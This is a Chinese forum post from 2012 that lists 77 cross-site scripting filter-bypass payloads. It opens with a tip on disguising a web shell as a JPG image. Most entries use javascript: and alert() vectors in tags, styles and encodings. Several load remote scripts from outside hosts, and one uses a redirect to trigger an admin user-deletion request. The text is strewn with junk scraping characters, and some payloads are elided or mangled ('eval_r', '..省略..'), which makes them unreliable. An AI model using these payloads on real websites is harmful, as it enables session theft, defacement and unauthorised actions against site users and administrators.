跨站图片shell+ Z: d4 D2 q& K" ]# `6 s( r3 |
XSS跨站代码 <script>alert("")</script>
7 e, y1 J1 p$ y$ i6 \6 F
6 N2 M ]8 B7 U将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马8 Z ~, E4 b0 o3 O5 p& A) i
: L: q6 M$ W- K6 ^" L* c8 T" I6 t
. G2 Y6 g+ n; H' b5 C3 @5 U# p6 Y# R Q
1)普通的XSS JavaScript注入
6 E4 R4 k# {6 c+ `2 e<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, J# X5 f) C9 n# i
# E0 m& ]6 [+ g+ ~(2)IMG标签XSS使用JavaScript命令
3 A3 k/ @- o% z9 u$ ^1 d7 Z9 f, D' F3 R<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 A! M7 u) s1 w, a5 p* T$ `/ B8 W3 f# n, ~
(3)IMG标签无分号无引号
; J0 x' U6 S+ x% P+ ^! G<IMG SRC=javascript:alert(‘XSS’)>4 Z- _& ?8 f" D$ f3 F
1 }& l V# \" K v3 I. u3 P+ I
(4)IMG标签大小写不敏感
& d- N L2 c5 V) Z! u% ~+ V<IMG SRC=JaVaScRiPt:alert(‘XSS’)>( ~ w9 p W" x) _
# a l' _- P1 t4 h b& [ V2 x
(5)HTML编码(必须有分号)
: A) q& i* e; \) C7 I<IMG SRC=javascript:alert(“XSS”)>
# X5 M( o6 c/ R# p
* V" |6 o( V5 k! {' h; S/ X(6)修正缺陷IMG标签' z0 m' A0 w7 ]; R& C) Q7 `
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
& E0 x+ G2 U: @6 R0 X- s6 e
3 J* A: u8 \# z$ r6 w( i* p: B6 C+ X(7)formCharCode标签(计算器)
, ]. K/ y4 O, D8 N<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" f* K( ~; |9 S/ m2 t
- p. R0 k6 k7 Q8 t' l" d) g( R( _
(8)UTF-8的Unicode编码(计算器)+ _; ^4 ?2 r6 E6 Q- y( C
<IMG SRC=jav..省略..S')>* D7 u4 _, a. n9 d/ Q* L5 ^
; ^ J& v" U+ U' T* N' k(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: Q* g. w. D) W3 c0 Q) F<IMG SRC=jav..省略..S')>
3 y4 W& t% `0 c' @7 N# D1 R9 u% V( m; t& ]- l, s8 L3 q) ?
(10)十六进制编码也是没有分号(计算器)$ M" d H# z; o3 x8 Z
<IMG SRC=java..省略..XSS')>& l3 h/ u0 a3 d0 d; A( P# s
5 _3 B9 ^( B N7 L4 W) o
(11)嵌入式标签,将Javascript分开
3 V/ L, k |* z. E- q7 @/ l5 ?) Y<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 d9 D6 a' B( v# m2 {. M1 ^
9 e. k0 a4 j, n3 R$ i% A) Y(12)嵌入式编码标签,将Javascript分开* p8 Q; ]2 ^7 |" \- Y, D
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 V0 F0 D7 r9 q" V0 m7 C( U
" N- J+ `# M, a2 V5 v(13)嵌入式换行符
7 l( `2 K( s9 W8 s* ]1 t( {<IMG SRC=”jav ascript:alert(‘XSS’);”>2 N2 j0 m- V& E+ @
& |% v- O5 M4 _& _6 m q! h6 k(14)嵌入式回车
1 D8 r5 j" y- \, I' t0 k6 M<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 ?! \" l" t; Q8 [9 @
6 p- c7 {- h2 g8 y: o(15)嵌入式多行注入JavaScript,这是XSS极端的例子8 u; a2 F" y4 j; r) [5 d2 r% J
<IMG SRC=”javascript:alert(‘XSS‘)”>
; K8 A) s) Q$ U! v0 _& u7 o4 A( d( Q, e& k$ f9 {; x! }3 G
(16)解决限制字符(要求同页面)& W% O! P% k( t# s8 U
<script>z=’document.’</script>
3 b$ R1 l6 N }<script>z=z+’write(“‘</script># H/ n, G1 e, G% q( l7 w
<script>z=z+’<script’</script>
6 i6 E1 Y( V4 ]/ H3 |; S<script>z=z+’ src=ht’</script>. H% U2 y* J; W9 `& S
<script>z=z+’tp://ww’</script>/ A z. o! U/ X! \8 Q. T4 r2 W
<script>z=z+’w.shell’</script>
8 q8 U8 Q# S- d) w P' g: h<script>z=z+’.net/1.’</script>
J; n6 X1 I5 p. z+ o<script>z=z+’js></sc’</script># D: }, z2 L1 }& E/ q. P
<script>z=z+’ript>”)’</script>
* d, m1 c3 Q$ ^<script>eval_r(z)</script>
/ S0 _1 M H! a9 |6 A; f" q5 t& d2 b o( L/ f6 N$ M6 @' ] ~
(17)空字符
7 v1 m; M {2 P3 d% B* V9 aperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* w# W7 }; a& Q M8 \- D3 x; i8 p) }" r, u5 ^3 [
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ X/ a, ^% Y3 G8 p5 ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 |# U) y4 e: r$ H/ W8 d& k6 P( Z9 q/ S$ d& O$ k3 X
(19)Spaces和meta前的IMG标签# V7 O, J2 o5 M' e1 {+ q
<IMG SRC=” javascript:alert(‘XSS’);”>( e$ e! |& e- h5 z& K+ n# j$ {, S" m
. a5 L# Z1 `5 y% ?
(20)Non-alpha-non-digit XSS8 l) p- P3 Z# L! U! [
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ B# f; r" O T$ y
8 O, v3 }2 T( J8 |+ g( V- H, T(21)Non-alpha-non-digit XSS to 2
4 |' ?& A4 h5 r2 |) r<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
6 n& o; p2 h: E; u- t
* @% R: V4 s* K+ W(22)Non-alpha-non-digit XSS to 3
* C8 b" g0 E5 @; b4 R1 y<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% |- o+ D" d) n- g' a4 i' l( a' i, i! o# l
(23)双开括号; Y2 P' [3 @1 z' D! ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ f, Z' d; x3 Z3 D6 K2 [! J2 Y% h" ~1 L3 ` C
(24)无结束脚本标记(仅火狐等浏览器)% \4 z+ F" \1 z* r" M! L
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>) Z. ?- N5 r& h
6 g8 E( O p2 H1 ^1 Z. I(25)无结束脚本标记20 ]# p5 v l( Z. i
<SCRIPT SRC=//3w.org/XSS/xss.js>( W/ k a! ^. Q
. O! n. A C. p
(26)半开的HTML/JavaScript XSS0 s3 ]* }$ h) `$ T
<IMG SRC=”javascript:alert(‘XSS’)”% x& S$ O/ w: E8 L- g1 x
" n9 ?( ~0 B. c' b(27)双开角括号
! ?- s5 |6 a& H9 q5 i# O<iframe src=http://3w.org/XSS.html <
0 S) T# O$ F! H' v0 I. Y5 _% a% w
(28)无单引号 双引号 分号5 U5 X4 p L, N8 ?: S% s
<SCRIPT>a=/XSS/3 X0 l$ [; X, Z" @
alert(a.source)</SCRIPT>1 x- E4 N* S2 w
/ q& B0 I' `3 v O3 _(29)换码过滤的JavaScript
: t9 D& F) q: \6 I" K\”;alert(‘XSS’);//
3 ~( K, y( |3 a2 S# j! {. t2 h; `+ P
(30)结束Title标签
% }, g" c$ }2 b9 h, `" V</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
/ a' d% U+ ~* M# o. G5 N% Y. ]3 V/ l3 `' W1 P- R# Y) K" ~% t0 n1 M
(31)Input Image2 d F1 M: M, K9 |; ?' d8 q; ^" R
<INPUT SRC=”javascript:alert(‘XSS’);”>* I( ~5 g, K$ w0 Q* ?- [7 u
6 }) A& a# q- J2 K(32)BODY Image
9 q& Y2 q( f9 z% u3 ^<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ \6 }- N# [; O. R& ]% b+ p$ E
; K2 K# @9 F% W% s(33)BODY标签; [4 i; b$ i0 Q! ~
<BODY(‘XSS’)>8 z* n8 H M* y
& R: \, [+ H- m, Q; |
(34)IMG Dynsrc
$ s7 L* \& g( _, q<IMG DYNSRC=”javascript:alert(‘XSS’)”>
5 l) t4 n, Z8 w" P6 p) r
9 B6 Q; t9 o/ ]$ a8 w' R g+ d(35)IMG Lowsrc" a$ ~7 R# l; R# [4 S" T& c
<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ z: C% B( _2 e" L
9 c5 Q) c6 s S: L H(36)BGSOUND
0 X; P/ L% z9 |<BGSOUND SRC=”javascript:alert(‘XSS’);”>5 l7 V7 g; E- J8 m1 H+ o/ Q( p2 k
6 q+ ^% S+ k1 }: b0 J
(37)STYLE sheet
) s$ U: D# } Q$ }+ r9 T<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>: t/ z1 _! h+ W: _& y
7 c" }9 w2 p2 |9 F% V* I(38)远程样式表
& ]! J7 a. m! q/ ]/ k/ w% ~<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 ?) Z/ P% g0 C
0 w4 N/ _8 R: f# Q(39)List-style-image(列表式)
3 R9 N5 [" L* q. y( i' p# H& B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% l$ a: N2 Q$ d8 y% L
7 l2 b, Y! u) {(40)IMG VBscript
5 ?: E9 j. y( M- {8 k" {<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS7 W9 O# P! H2 o& p. Z
6 ^" `. X4 \/ P4 @; p(41)META链接url
# G8 |4 }" e+ g$ u. x S<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>7 i5 s9 c+ m& s x
$ J5 V5 E% J, \0 a" {2 g6 U8 v& Y
(42)Iframe
$ j: b. `7 Z! _( B; q<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>. r) S4 B2 \8 c
(43)Frame
$ p1 ]( R6 ~% ]/ g; ]/ s% k$ i& ? T3 D<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
0 j. t; a% ^: m4 v3 T# T8 I e0 ^+ M: ]. `% J0 o9 O
(44)Table8 c' a7 Z+ S+ a
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) o* R$ M% i: X+ t' }7 s3 v7 D4 _! U, g' A! y) E- t
(45)TD
. A- c+ `. ~1 m8 {<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% T1 H2 Q# V/ G% q
# s2 U- M1 M( H/ m9 R# s: I( r(46)DIV background-image
/ u( T6 ]1 \6 m<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ d7 K- S# x9 {8 {8 F
6 H& @0 W5 T7 |- t(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
8 L! k6 ?$ _/ A) Y" v( e: k" T<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>+ g4 w1 L" Q$ d8 {/ g% F% @0 p% ]' d
( [6 x( i/ r5 t; a8 a
(48)DIV expression
5 L$ d+ D8 U# d<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
( x6 Q4 G; R6 M) k
4 D# q4 J8 Z! j" L" t L, `( i(49)STYLE属性分拆表达
) F4 Q7 X: v: J+ z% [9 Z6 C<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ b" O9 H s& E0 w. j- O# u& G6 }! ~* H; E5 t$ e0 p8 H! z
(50)匿名STYLE(组成:开角号和一个字母开头)+ s7 f' e( G& W7 ~7 K: V: v
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 L% A/ H6 V- g+ g" _; f8 {8 J% |6 v; K7 M
(51)STYLE background-image. q0 |1 }( b. [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 j( [5 x$ p$ S1 c$ s7 m- [
$ O- |5 w. N5 V% p: K/ j(52)IMG STYLE方式& ]8 |! r: M1 Q' [; g
exppression(alert(“XSS”))’>
. _, l0 m; y z
3 j. W; a% V+ I1 F8 K(53)STYLE background. v+ a/ m7 X3 s# _# U2 C; V# @% Q) ]
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ ^! j3 S+ F- S: h4 A1 j7 q! S# V- f, d2 h( I: N
(54)BASE
9 J# |. N, C1 g<BASE HREF=”javascript:alert(‘XSS’);//”>
' ?* n0 \. Z1 a8 F6 w' B8 r! x4 P
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" f& ?: Q% v* ~$ {* E5 h<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ y0 u2 Q. k; \9 E3 }4 y1 T) ~# a- j
( b, a" l m9 E, S6 u! U! `
(56)在flash中使用ActionScrpt可以混进你XSS的代码
2 o2 r! A0 K6 i! ^% Ha=”get”;
* w' A1 G, } m0 gb=”URL(\”";
& c% M$ J! S5 j3 {; Fc=”javascript:”;3 z: v% r. y4 {" ^6 _- j
d=”alert(‘XSS’);\”)”;
" ?8 P% I+ o8 m& E! weval_r(a+b+c+d);
7 g7 h5 p, x( l$ p6 Y. }
|; I; ^% s q6 d% S(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
$ V+ A. t, i2 R<HTML xmlns:xss>
, q4 g: R) f* Q$ Y ?$ Y<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 c( d" i4 \! O0 }( N' H
<xss:xss>XSS</xss:xss>& b1 w- x" O) y6 r# _
</HTML>
, Q/ g4 A* p! W. r! M) k9 r; K+ _8 ^/ v; g; n0 G% i7 O
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用' p3 \( _1 @* {, w+ ~
<SCRIPT SRC=””></SCRIPT>
7 t0 R: X' o& M6 j) }: ]% U# |4 m% N* L' ~
(59)IMG嵌入式命令,可执行任意命令
9 b! b! _3 k h5 ?7 O<IMG SRC=”http://www.XXX.com/a.php?a=b”>$ x! `- B G) Y0 t& j/ u# D* L- ^
# {2 \0 R' r+ _; v5 n
(60)IMG嵌入式命令(a.jpg在同服务器)* c) E9 t4 I) x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 B% T+ J( v- C3 o
5 L. |# N3 k$ n9 x, P(61)绕符号过滤
; v, @/ i) ~: x' B# r1 k5 u- d) {) X<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# @- s- v* R3 _6 R1 n& y; M" G" }& j
+ |; s8 ^9 g Z1 t7 B(62): J* D+ N6 O* R, O' n" V6 Q' I5 t
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
c! r* i& C8 c! H3 k' k+ X0 W% y' B' z# V* `
(63)
8 ?) g: g# ^9 d; O. D4 `; H& H<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>9 @1 O8 `% f( j1 w. W
3 ]' B7 q$ P9 l8 i0 Y7 v(64)
! H0 I& a( E' z5 h* f9 l<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>7 n8 s* ^) o& Y8 \7 R; j2 y0 K
, m9 E. o* j& J1 U% J(65)5 y5 o, a' U8 \+ }& t1 d1 |
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 V- z6 D8 l; b \6 b7 m
5 Q7 k: F9 _0 u! d/ i3 [
(66)
/ o. n; z* t. q& X; \<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- e" S& W5 a; [ k" O' v/ `" x. r7 `0 ^' f
(67)
% @$ w/ d+ J" Z; k<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
& I% f# T8 [, a5 h
3 j8 i4 m+ g2 i6 I8 M' s6 I( j1 |(68)URL绕行7 P7 W* [# y+ g8 | H8 C# t- ]
<A HREF=”http://127.0.0.1/”>XSS</A>- j, B: z4 W7 ~. R! @+ e0 u/ W2 v+ O
8 P" U1 n9 U/ U5 t; z" I5 I! N(69)URL编码
7 [3 g. m# d# B& d, `% v8 K<A HREF=”http://3w.org”>XSS</A>5 y+ ~7 x! G) Y0 }
5 s4 g# X$ ^/ S {' x" M8 F(70)IP十进制5 ^3 f1 A+ z |+ j; ^8 _
<A HREF=”http://3232235521″>XSS</A>! D6 P1 {$ i7 V' X) w' n9 O
- ^8 n% r4 ?1 b# t) G" W5 t3 C0 k E: c7 t(71)IP十六进制% T& A! ]6 w0 w6 B' a' w4 \* V) n
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 C2 P! e2 X0 B- Y ^7 f4 r- b- \- H: \' N4 D7 F! u
(72)IP八进制
2 ]1 \7 y, C0 m3 c6 _* a; q<A HREF=”http://0300.0250.0000.0001″>XSS</A>
: B p$ z; o9 J6 K% W6 I1 J
0 I: _# d: \/ t(73)混合编码* E/ t5 W$ W' V' a" Q- |1 ]
<A HREF=”h
8 _2 g: F1 V& ? B0 a. X0 O* r6 mtt p://6 6.000146.0×7.147/”">XSS</A>/ c- x- N1 P9 u. R& o% o
7 ?; p" D8 z# t8 O& P+ f" B
(74)节省[http:]# q9 R6 x, n6 D% C {- _
<A HREF=”//www.google.com/”>XSS</A>, t1 D* }% ?3 `8 ] k, \) O6 a7 o$ w
8 ]- G; l" W, R9 ](75)节省[www]
8 ~& W8 L p" D5 A; z( z<A HREF=”http://google.com/”>XSS</A>
+ D2 f; e- R# [: Z- k% j' x! R% n! G/ U1 H! K
(76)绝对点绝对DNS% s, g$ e6 M2 Z* k+ U3 i
<A HREF=”http://www.google.com./”>XSS</A>
0 k7 ?1 \6 S8 M# A% F7 n
. Y3 M8 N! ]/ U% j# c2 ~(77)javascript链接8 p! m q- q! I
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>% s5 U( |# |" G4 {
|
发表于 2012-9-13 17:04:56
收藏
支持
反对